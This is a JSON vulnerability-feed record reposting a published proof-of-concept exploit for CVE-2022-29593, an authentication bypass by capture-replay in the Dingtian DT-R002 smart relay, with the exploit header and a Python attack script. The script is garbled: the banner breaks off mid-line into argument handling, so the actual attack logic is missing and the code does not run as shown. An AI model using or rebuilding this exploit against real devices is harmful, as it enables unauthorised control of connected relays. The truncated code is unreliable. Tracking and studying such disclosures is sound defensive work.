{"uuid": "fdd70766-3367-4dd4-8d2a-333c239012f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-29593", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/63508", "content": "Exploit Collector\nDingtian-DT-R002 3.1.276A Authentication Bypass\n\nhttps://2.bp.blogspot.com/-466o0SY5wbQ/WWlvXOxbxYI/AAAAAAAAIOQ/eHwtwujRsQI9h-mxYQXglBmw7d5gufaKwCLcBGAs/s1600/h51.png Dingtian-DT-R002 version 3.1.276A suffers from an authentication bypass vulnerability.\n\nSHA-256 | c4aafb04ab940ad8ed639d090f1cb3dab189b7a09aab3cd311715b6cd8f14560Download # Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass\n# Google Dork: NA\n# Date: 13th July 2022\n# Exploit Author: Victor Hanna (Trustwave SpiderLabs)\n# Author Github Page: https://9lyph.github.io/CVE-2022-29593/\n# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html\n# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download\n# Version: V3.1.276A\n# Tested on: MAC OSX\n# CVE : CVE-2022-29593#!/usr/local/bin/python3\n# Author: Victor Hanna (SpiderLabs)\n# DingTian DT-R002 2CH Smart Relay\n# CWE-294 - Authentication Bypass by Capture-replay\n\nimport requests\nimport re\nimport urllib.parse\nfrom colorama import init\nfrom colorama import Fore, Back, Style\nimport sys\nimport os\nimport time\n\nfrom urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\ndef banner():\nprint (\"[+]********************************************************************************[+]\")\nprint (\"|   Author : Victor Hanna (9lyph)[\"+Fore.RED + \"SpiderLabs\" +Style.RESET_ALL+\"]\\t\\t\\t\\t\\t    |\")\nprint (\"|   Description: DingTian DT-R002 2CH Smart Relay                                      |\")\nprint (\"|   Usage : \"+sys.argv[0]+\" 2: \nhost = sys.argv[1]\nrelay = sys.argv[2]\nmain ()\nelse:\nprint (Fore.RED + f\"[+] Not enough arguments, please specify target and relay!\" + Style.RESET_ALL) Source:packetstormsecurity.com", "creation_timestamp": "2026-09-06T00:00:44.891590Z"}